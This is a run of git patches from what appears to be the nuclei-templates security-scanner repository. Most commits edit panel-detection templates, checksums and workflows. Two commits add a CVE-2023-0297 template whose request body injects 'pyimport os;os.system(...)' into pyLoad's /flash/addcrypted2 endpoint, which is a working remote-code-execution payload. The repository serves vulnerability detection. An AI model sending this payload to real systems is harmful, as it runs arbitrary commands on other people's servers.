17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 4 Jul 2023 15:21:04 +0530 Subject: [PATCH 352/609] updated matchers --- http/exposed-panels/efak-panel.yaml | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/efak-panel.yaml b/http/exposed-panels/efak-panel.yaml index ac14c775c7..7f803e4b17 100644 --- a/http/exposed-panels/efak-panel.yaml +++ b/http/exposed-panels/efak-panel.yaml @@ -1,7 +1,7 @@ -id: efak-panel +id: efak-login-panel info: - name: Eagle For Apache Kakfa Login - Panel + name: Eagle For Apache Kakfa Login - Detect author: irshad ahamed severity: info description: | @@ -10,21 +10,28 @@ info: - https://github.com/smartloli/efak - https://www.kafka-eagle.org/ metadata: + max-request: 1 verified: true shodan-query: http.favicon.hash:1693580324 - max-request: 1 - tags: efak,panel,login + tags: panel,efak,login,detect http: - method: GET path: + - "{{BaseURL}}" - "{{BaseURL}}/account/signin?/" + stop-at-first-match: true + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word words: - 'Login - EFAK' + - 'Eagle For Apache Kafka' + - '

    EFAK

    ' + condition: or - type: status status: From 411915fcae8aaac49711cba9e25fd867b831c295 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 4 Jul 2023 15:49:56 +0530 Subject: [PATCH 353/609] workflow fixes --- workflows/sap-netweaver-workflow.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/workflows/sap-netweaver-workflow.yaml b/workflows/sap-netweaver-workflow.yaml index 5e6d8c8a2e..a4f94ae8d0 100644 --- a/workflows/sap-netweaver-workflow.yaml +++ b/workflows/sap-netweaver-workflow.yaml @@ -17,6 +17,6 @@ workflows: - template: http/exposed-panels/sap-hana-xsengine-panel.yaml - template: http/misconfiguration/sap/ - - template: network/sap-router.yaml # Network Templates + - template: network/detection/sap-router.yaml # Network Templates subtemplates: - - template: network/sap-router-info-leak.yaml + - template: network/misconfig/sap-router-info-leak.yaml From 3e59c3e363f9220d0ea32ea12ccedb1e11b34727 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 10:48:07 +0000 Subject: [PATCH 355/609] Auto Generated Templates Checksum [Tue Jul 4 10:48:07 UTC 2023] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 293f5b41bc..c2cf0e430d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:b322c9ba292e0298b561b25a8950e989c4b50787 TEMPLATES-STATS.md:a53dea26d4e3da65292a159ecd28b58abe0f6f3a TOP-10.md:f96c096252794274c196f158e78053e036412447 contributors.json:db5c97304376896f78f0752cca0e621d7c97b235 -cves.json:6f6522c4f81a83ea6d81232a8f0431ae89debd56 -cves.json-checksum.txt:de8647fd559b188eefb327d735e6248559639a97 +cves.json:b34482e51322718857e9ee10c4c317ef24235777 +cves.json-checksum.txt:53a48e1332a61ef896c0390e55bcb6a84ab1e5cf dns/azure-takeover-detection.yaml:90ea816357526ee7c170731114de8fc0a2357a27 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/cname-fingerprint.yaml:f7200ff1f3b3f96a7a92ddd6b49e5e5abe1d2377 @@ -2284,7 +2284,7 @@ http/cves/2023/CVE-2023-2780.yaml:dd29bca7f9f6c5e4ecdfa4b29c86a365af626436 http/cves/2023/CVE-2023-28121.yaml:8597360791d1374d994064c71b6cfacb3e5d8ce1 http/cves/2023/CVE-2023-2825.yaml:71dcd086a266e962a2dd48ff0f1698d57a029ce7 http/cves/2023/CVE-2023-28343.yaml:4551a7c5763274fc8b10c6d805a55c695b70ab22 -http/cves/2023/CVE-2023-28432.yaml:7cae99134a98c0d8fe314d759d7e5213138af7d1 +http/cves/2023/CVE-2023-28432.yaml:755387cfedd81b00c66955f39b60850e92203998 http/cves/2023/CVE-2023-29084.yaml:b0b7c4657722b17d7f32d8eabb161e3a07c17a72 http/cves/2023/CVE-2023-29489.yaml:5f37866efc6a153c648b2dc86491b8e58ef1a359 http/cves/2023/CVE-2023-29622.yaml:749c4f0cf235fe13a8fa9ed93c48344f8c7f965c @@ -6494,7 +6494,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:393986fa9f05004f7042cceec9ea9ec3c1ba3987 +templates-checksum.txt:3cc806b33d67abc7a4a111cd24a3b26e599d2f4e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 8e49e21b8a830aa0d69018f09f831a9d1fb2cc59 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 10:48:16 +0000 Subject: [PATCH 356/609] Auto Generated New Template Addition List [Tue Jul 4 10:48:16 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d374468717..f58034e729 100644 --- a/.new-additions +++ b/.new-additions @@ -5,5 +5,6 @@ http/cves/2018/CVE-2018-6530.yaml http/cves/2023/CVE-2023-28121.yaml http/exposed-panels/arangodb-web-Interface.yaml http/exposed-panels/dell-idrac.yaml +http/exposed-panels/efak-panel.yaml http/exposed-panels/pritunl-panel.yaml http/exposed-panels/untangle-admin-login.yaml From 654e928b4070e5eb1e3ff5450859ce45a46280a5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 10:49:59 +0000 Subject: [PATCH 357/609] TemplateMan Update [Tue Jul 4 10:49:59 UTC 2023] :robot: --- http/exposed-panels/efak-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/efak-panel.yaml b/http/exposed-panels/efak-panel.yaml index 7f803e4b17..a2e23f5568 100644 --- a/http/exposed-panels/efak-panel.yaml +++ b/http/exposed-panels/efak-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/smartloli/efak - https://www.kafka-eagle.org/ metadata: - max-request: 1 - verified: true + max-request: 2 shodan-query: http.favicon.hash:1693580324 + verified: true tags: panel,efak,login,detect http: From bb591307b43020217ff01fe4150d1ebd46221919 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 4 Jul 2023 16:47:01 +0530 Subject: [PATCH 358/609] updated matchers --- http/exposed-panels/arcserve-panel.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/arcserve-panel.yaml b/http/exposed-panels/arcserve-panel.yaml index 09028c356d..a9f8a0ee08 100644 --- a/http/exposed-panels/arcserve-panel.yaml +++ b/http/exposed-panels/arcserve-panel.yaml @@ -1,18 +1,18 @@ id: arcserve-panel info: - name: ArcServe - Panel + name: ArcServe Panel - Detect author: DhiyaneshDk severity: info reference: - https://twitter.com/HunterMapping/status/1674267368359444480 - https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe metadata: - verified: true max-request: 1 - fofa-query: icon_hash="-1889244460" + verified: true shodan-query: http.favicon.hash:-1889244460 - tags: panel,login,arcserve + fofa-query: icon_hash="-1889244460" + tags: panel,login,arcserve,detect http: - method: GET @@ -24,7 +24,9 @@ http: - type: word part: body words: - - "Arcserve UDP Agent" + - "Arcserve UDP" + - "/arcserve.js" + condition: or - type: status status: From 5c89e545a5b2cf80cbe80695dc2ef233fbe2a61b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 4 Jul 2023 16:48:12 +0530 Subject: [PATCH 359/609] Rename efak-panel.yaml to efak-login-panel.yaml --- http/exposed-panels/{efak-panel.yaml => efak-login-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/exposed-panels/{efak-panel.yaml => efak-login-panel.yaml} (100%) diff --git a/http/exposed-panels/efak-panel.yaml b/http/exposed-panels/efak-login-panel.yaml similarity index 100% rename from http/exposed-panels/efak-panel.yaml rename to http/exposed-panels/efak-login-panel.yaml From e5e2a9a2f817269c452ca38a49b8799254afe17c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 11:18:28 +0000 Subject: [PATCH 360/609] Auto Generated New Template Addition List [Tue Jul 4 11:18:28 UTC 2023] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index f58034e729..02d720a14b 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,6 @@ http/cves/2018/CVE-2018-6530.yaml http/cves/2023/CVE-2023-28121.yaml http/exposed-panels/arangodb-web-Interface.yaml http/exposed-panels/dell-idrac.yaml -http/exposed-panels/efak-panel.yaml +http/exposed-panels/efak-login-panel.yaml http/exposed-panels/pritunl-panel.yaml http/exposed-panels/untangle-admin-login.yaml From 0673bd84f5f9fbc89ec13ceac42394b43f91793c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 11:18:43 +0000 Subject: [PATCH 361/609] Auto Generated Templates Checksum [Tue Jul 4 11:18:43 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c2cf0e430d..94405d4424 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2666,6 +2666,7 @@ http/exposed-panels/earcu-panel.yaml:4680b33172ce468b93eb9defa13bc3dc9bb50d9a http/exposed-panels/eclipse-birt-panel.yaml:18b81d2ea0b3ab529dd65947a962b2b0ee7777e3 http/exposed-panels/ecosys-command-center.yaml:b03b6f6fc246a3f04b040213838a7fdee615f95c http/exposed-panels/edgeos-login.yaml:1c77400a2a73bdabd6ab55b7c3c0aa171f65b4a1 +http/exposed-panels/efak-login-panel.yaml:647a69312cfd4f6e6bdefb450573ad13d5290119 http/exposed-panels/eko-management-console-login.yaml:f6a17fdde102d3907652cead2d898c9d92522c3a http/exposed-panels/eko-software-update-panel.yaml:498ae0fbbb4b932746e1a10ccb2794d6f422f738 http/exposed-panels/elemiz-network-manager.yaml:07ee55d78342df88368e93fb67b4b94402b2012b @@ -6494,7 +6495,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:3cc806b33d67abc7a4a111cd24a3b26e599d2f4e +templates-checksum.txt:77809a5f27ddc9443e3718f36417c562329fa46c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From afccb060e36f7a84a9f1574c68920269e7aaaefc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 4 Jul 2023 16:53:23 +0530 Subject: [PATCH 362/609] Update cloudpanel-login.yaml --- http/exposed-panels/cloudpanel-login.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/exposed-panels/cloudpanel-login.yaml b/http/exposed-panels/cloudpanel-login.yaml index b73c1af9a8..4c2373379f 100644 --- a/http/exposed-panels/cloudpanel-login.yaml +++ b/http/exposed-panels/cloudpanel-login.yaml @@ -1,15 +1,15 @@ id: cloudpanel-login info: - name: CloudPanel - Login + name: CloudPanel Login - Detect author: DhiyaneshDk severity: info metadata: - verified: true max-request: 1 - fofa-query: icon_hash="151132309" + verified: true shodan-query: http.favicon.hash:151132309 - tags: panel,login,cloudpanel + fofa-query: icon_hash="151132309" + tags: panel,login,cloudpanel,detect http: - method: GET From 79f5b8f64b91912830f7a1ff93ee1716150f5b08 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 11:25:03 +0000 Subject: [PATCH 364/609] Auto Generated Templates Checksum [Tue Jul 4 11:25:03 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 94405d4424..8b7f17836f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4182,7 +4182,7 @@ http/misconfiguration/server-status-localhost.yaml:677ac5c9de543dd931573991779c0 http/misconfiguration/server-status.yaml:41b7f28ee9e067587f9d807223d90244c4ab1b9e http/misconfiguration/service-pwd.yaml:4bc614e60df3c39c2a33c28adef4d5fc57572452 http/misconfiguration/setup-github-enterprise.yaml:183d7d86ceab3bedd7dfa2e7064966c0d3a1e686 -http/misconfiguration/shell-history.yaml:79a5aa9e947fc3967e3f0d01e0072e5cbb020e5b +http/misconfiguration/shell-history.yaml:4c5c3d65419039513c8df65eef0bb01dca5424c6 http/misconfiguration/sitecore-debug-page.yaml:1a8f8f0611a6fbc5089021432968316fa63783af http/misconfiguration/sitecore-lfi.yaml:d2a97faf5d50dac881cdb66f6f5df5cb169f4ab5 http/misconfiguration/skycaiji-install.yaml:db8fa1743c9152bc0cbda2c3e2fcaac1f93f17ac @@ -6495,7 +6495,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:77809a5f27ddc9443e3718f36417c562329fa46c +templates-checksum.txt:c0cb09116ab3bd2bb6a0811f9ba4609908e3f59a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 4ea520c046a34496dd108c6c602f830be737c739 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 11:32:01 +0000 Subject: [PATCH 365/609] Auto Generated New Template Addition List [Tue Jul 4 11:32:01 UTC 2023] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 02d720a14b..6a3f92ccac 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,8 @@ file/webshell/php-webshell.yaml http/cves/2018/CVE-2018-6530.yaml http/cves/2023/CVE-2023-28121.yaml http/exposed-panels/arangodb-web-Interface.yaml +http/exposed-panels/arcserve-panel.yaml +http/exposed-panels/cloudpanel-login.yaml http/exposed-panels/dell-idrac.yaml http/exposed-panels/efak-login-panel.yaml http/exposed-panels/pritunl-panel.yaml From 47d220ea7afeae432682e5e62ce0c8ca36d7900e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 11:32:14 +0000 Subject: [PATCH 366/609] Auto Generated Templates Checksum [Tue Jul 4 11:32:14 UTC 2023] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8b7f17836f..c1e949f1ae 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2498,6 +2498,7 @@ http/exposed-panels/arcgis/arcgis-rest-api.yaml:13a24d8cae266f0262519f7aebef401b http/exposed-panels/arcgis/arcgis-services.yaml:82ce551d279a9d6c531a18f099e2046f9e3594ea http/exposed-panels/arcgis/arcgis-tokens.yaml:45cf23e074e3f7228b94416a19f8d1551fd4c664 http/exposed-panels/archibus-webcentral-panel.yaml:1387b64acd9b5192e4525d83db62f7ff4320852b +http/exposed-panels/arcserve-panel.yaml:5adaf24d77f9c1ca38bab7a5744f89aa6e68a010 http/exposed-panels/argocd-login.yaml:bdd490f67569902d8657a9f8453b22c507f5899d http/exposed-panels/arris-modem-detect.yaml:94c6ce3c19d48300dec93e609b27e8b5e2b0f529 http/exposed-panels/aspect-control-panel.yaml:4ef7859a7c920aac6f57066695c31a21f10ecd5a @@ -2593,6 +2594,7 @@ http/exposed-panels/citrix-vpn-detect.yaml:7ba972e45da3f1b3ce6fc69239cd9ed015b73 http/exposed-panels/claris-filemaker-webdirect.yaml:a2c9b13cb964734c72ff80c6030e947c429b9d31 http/exposed-panels/clave-login-panel.yaml:8ebd40ef0a85263b5d1ee596136ecd3b92f593c7 http/exposed-panels/clearpass-policy-manager.yaml:e6c4e2c12c46986d4be05e307ec278bdcf33912b +http/exposed-panels/cloudpanel-login.yaml:1aa24222b0743bf453d39181ad0bcf8b700970f1 http/exposed-panels/cloudphysician-radar.yaml:dee00c79c88e60534e50fa550052d7b7685a70f0 http/exposed-panels/cobbler-webgui.yaml:9e0367ce93a24f79633e8a71e2f1a94bd9804a4d http/exposed-panels/code-server-login.yaml:6f7e0aea6fd6a66a1c3afac6a722a5218481d5dc @@ -6495,7 +6497,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:c0cb09116ab3bd2bb6a0811f9ba4609908e3f59a +templates-checksum.txt:0c1c5a2fe294cbd5ff93d05126ec5bcc93958f1c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 12337586f96c9cfe8c8873250ee19b4dbff5f0f4 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 4 Jul 2023 17:24:43 +0530 Subject: [PATCH 367/609] Create auto-comment.yml --- .github/auto-comment.yml | 10 ++++++++++ 1 file changed, 10 insertions(+) create mode 100644 .github/auto-comment.yml diff --git a/.github/auto-comment.yml b/.github/auto-comment.yml new file mode 100644 index 0000000000..eba1100f1b --- /dev/null +++ b/.github/auto-comment.yml @@ -0,0 +1,10 @@ +# Comment to a new issue. +issuesOpened: > + Thank you for raising an issue. We will try and get back to you as soon as possible. + + Please make sure you have given us as much context as possible. + +pullRequestOpened: > + Thank you for raising your pull request. + + Please make sure you have followed our contributing guidelines. We will review it as soon as possible. From 0f1d2878268a3fb6dd2da63278d882dbc52425ca Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 4 Jul 2023 17:28:04 +0530 Subject: [PATCH 368/609] Revert "Create auto-comment.yml" This reverts commit 12337586f96c9cfe8c8873250ee19b4dbff5f0f4. --- .github/auto-comment.yml | 10 ---------- 1 file changed, 10 deletions(-) delete mode 100644 .github/auto-comment.yml diff --git a/.github/auto-comment.yml b/.github/auto-comment.yml deleted file mode 100644 index eba1100f1b..0000000000 --- a/.github/auto-comment.yml +++ /dev/null @@ -1,10 +0,0 @@ -# Comment to a new issue. -issuesOpened: > - Thank you for raising an issue. We will try and get back to you as soon as possible. - - Please make sure you have given us as much context as possible. - -pullRequestOpened: > - Thank you for raising your pull request. - - Please make sure you have followed our contributing guidelines. We will review it as soon as possible. From ac84955ae66672aec9570e488933181bccbdaf9e Mon Sep 17 00:00:00 2001 From: "alert('0-0')" <49817411+MrHarshvardhan@users.noreply.github.com> Date: Tue, 4 Jul 2023 18:21:35 +0530 Subject: [PATCH 369/609] CVE-2023-0297.yaml --- http/cves/2023/CVE-2023-0297.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 http/cves/2023/CVE-2023-0297.yaml diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml new file mode 100644 index 0000000000..6618e77f1c --- /dev/null +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -0,0 +1,21 @@ +id: flash-addcrypted2-rce +info: + name: Flash Addcrypted2 Remote Code Execution + author: MrHarshvardhan + severity: high + description: | + Template to detect the Flash Addcrypted2 Remote Code Execution vulnerability. + reference: + - https://www.exploit-db.com/exploits/51532 +requests: + - method: GET + path: + - /flash/addcrypted2 + attacks: + - raw: + - 'jk=pyimport%20os;os.system("CMD_PLACEHOLDER");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' + - 'CMD_PLACEHOLDER: "{cmd}"' + predicates: + - type: status + status: + - 200 From 276497b314108b9536645b38353f01f6d8e2ee63 Mon Sep 17 00:00:00 2001 From: "alert('0-0')" <49817411+MrHarshvardhan@users.noreply.github.com> Date: Tue, 4 Jul 2023 18:28:32 +0530 Subject: [PATCH 370/609] CVE-2023-0297.yaml --- http/cves/2023/CVE-2023-0297.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 6618e77f1c..7650a9483d 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -1,20 +1,20 @@ -id: flash-addcrypted2-rce +id: python-code-injection info: - name: Flash Addcrypted2 Remote Code Execution + name: Python Code Injection author: MrHarshvardhan - severity: high + severity: medium description: | - Template to detect the Flash Addcrypted2 Remote Code Execution vulnerability. - reference: - - https://www.exploit-db.com/exploits/51532 + Template to detect Python code injection vulnerabilities. + reference: xxx requests: - method: GET path: - /flash/addcrypted2 attacks: - raw: - - 'jk=pyimport%20os;os.system("CMD_PLACEHOLDER");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' - - 'CMD_PLACEHOLDER: "{cmd}"' + headers: + Content-type: application/x-www-form-urlencoded + body: jk=pyimport%20os;os.system("{{cmd}}");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa predicates: - type: status status: From 193847137680069f00d1b03bfdc0a84471ae75fb Mon Sep 17 00:00:00 2001 From: Marco Date: Tue, 4 Jul 2023 18:04:19 +0200 Subject: [PATCH 371/609] Update dom-xss.yaml 'htm' is a valid extension for HTML files and should be scanned --- file/xss/dom-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/file/xss/dom-xss.yaml b/file/xss/dom-xss.yaml index 479a02d38d..fa3d87dea9 100644 --- a/file/xss/dom-xss.yaml +++ b/file/xss/dom-xss.yaml @@ -18,6 +18,7 @@ file: - js - ts - html + - htm - php - cs - rb From 40c36258c88ccca0a00efa314f48f238f6629001 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 4 Jul 2023 22:58:59 +0530 Subject: [PATCH 372/609] minor -changes --- http/exposures/configs/collibra-properties.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/configs/collibra-properties.yaml b/http/exposures/configs/collibra-properties.yaml index 1ba06f2f6e..a2e87b39db 100644 --- a/http/exposures/configs/collibra-properties.yaml +++ b/http/exposures/configs/collibra-properties.yaml @@ -7,9 +7,9 @@ info: reference: - https://twitter.com/shaybt12/status/1662431219223605254 metadata: - verified: true max-request: 3 - tags: exposure,config,properties + verified: true + tags: exposure,config,collibra-properties,collibra http: From 4afbcd5a5b42b83a5c1950a9daaf5a0a896cdd40 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 18:52:48 +0000 Subject: [PATCH 374/609] Auto Generated Templates Checksum [Tue Jul 4 18:52:48 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c1e949f1ae..2175cd600d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -160,7 +160,7 @@ file/python/python-scanner.yaml:3774742345a3c2db504ab69a5a4f2e2584bb5ed3 file/webshell/asp-webshell.yaml:b0284098b274456c7e028cb788afd9bd26bc30ae file/webshell/jsp-webshell.yaml:4c5f4d1c414c8b7fba63db4651565ec747b3b015 file/webshell/php-webshell.yaml:c33fb686c46b8211a18eaae52f0444bb73a107f2 -file/xss/dom-xss.yaml:e43d8068f2bd1a7d2af72dac9974e57de29879c4 +file/xss/dom-xss.yaml:bed2f678fd0c27367a30d1cc2279ba3f863e52b5 headless/dvwa-headless-automatic-login.yaml:99a6c2734ab061798627d79fda8ee538aa6060a8 headless/extract-urls.yaml:c2ff7a092991c2dee191e84ba4129270aacc8914 headless/headless-open-redirect.yaml:001152420e1bc1f78b9263353f48db9dca6a023c @@ -6497,7 +6497,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:0c1c5a2fe294cbd5ff93d05126ec5bcc93958f1c +templates-checksum.txt:b7c24084e03395bb9aeb9331095b03c5dda896e9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From fa557d22da2eb096e8b62e1c82d5e3cd52025df3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 5 Jul 2023 08:54:47 +0530 Subject: [PATCH 375/609] minor changes - audit files --- file/android/debug-enabled.yaml | 1 + file/audit/cisco/configure-service-timestamps-debug.yaml | 2 +- .../cisco/configure-service-timestamps-logmessages.yaml | 2 +- file/audit/cisco/logging-enable.yaml | 4 ++-- file/audit/fortigate/heuristic-scan.yaml | 5 +++-- 5 files changed, 8 insertions(+), 6 deletions(-) diff --git a/file/android/debug-enabled.yaml b/file/android/debug-enabled.yaml index b4435a9f2d..578959f1de 100644 --- a/file/android/debug-enabled.yaml +++ b/file/android/debug-enabled.yaml @@ -5,6 +5,7 @@ info: author: gaurang severity: low description: Android debug enabling was detected. + tags: android,file file: - extensions: diff --git a/file/audit/cisco/configure-service-timestamps-debug.yaml b/file/audit/cisco/configure-service-timestamps-debug.yaml index 102604dd43..07900ba018 100644 --- a/file/audit/cisco/configure-service-timestamps-debug.yaml +++ b/file/audit/cisco/configure-service-timestamps-debug.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: info description: | - Cisco service timestamp configuration for debug process was detected. + The configuration for service timestamps on Cisco devices was not implemented for debugging purposes. It's important to note that timestamps can be added to either debugging or logging messages independently. reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm classification: diff --git a/file/audit/cisco/configure-service-timestamps-logmessages.yaml b/file/audit/cisco/configure-service-timestamps-logmessages.yaml index d1447b852c..754b0c28d5 100644 --- a/file/audit/cisco/configure-service-timestamps-logmessages.yaml +++ b/file/audit/cisco/configure-service-timestamps-logmessages.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x severity: info description: | - Cisco service timestamp configuration for log messages was detected. + Cisco service timestamp configuration for log messages was not implemented. reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm classification: diff --git a/file/audit/cisco/logging-enable.yaml b/file/audit/cisco/logging-enable.yaml index f12c2a4772..9d4a26916b 100644 --- a/file/audit/cisco/logging-enable.yaml +++ b/file/audit/cisco/logging-enable.yaml @@ -1,11 +1,11 @@ id: logging-enable info: - name: Cisco Logging Time Stamp Enable - Detect + name: Cisco Logging - Detect author: pussycat0x severity: info description: | - Cisco logging time stamp enable command enforces the monitoring of technology risks for organizations' network devices. + Cisco logging 'logging enable' enable command enforces the monitoring of technology risks for organizations' network devices. reference: - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/xe-16-6/config-mgmt-xe-16-6-book/cm-config-logger.pdf classification: diff --git a/file/audit/fortigate/heuristic-scan.yaml b/file/audit/fortigate/heuristic-scan.yaml index 1dd2784e11..865d16516a 100644 --- a/file/audit/fortigate/heuristic-scan.yaml +++ b/file/audit/fortigate/heuristic-scan.yaml @@ -1,10 +1,11 @@ id: heuristic-scan info: - name: Fortinet Heuristic Scanning - Configuration + name: Fortinet Heuristic Scanning Configuration - Detect author: pussycat0x severity: info - description: Fortinet heuristic scanning configuration is advised to thwart attacks. Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message is forwarded to the recipient, and blocked files are quarantined if quarantine is enabled. + description: | + Fortinet heuristic scanning configuration is advised to thwart attacks. Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and 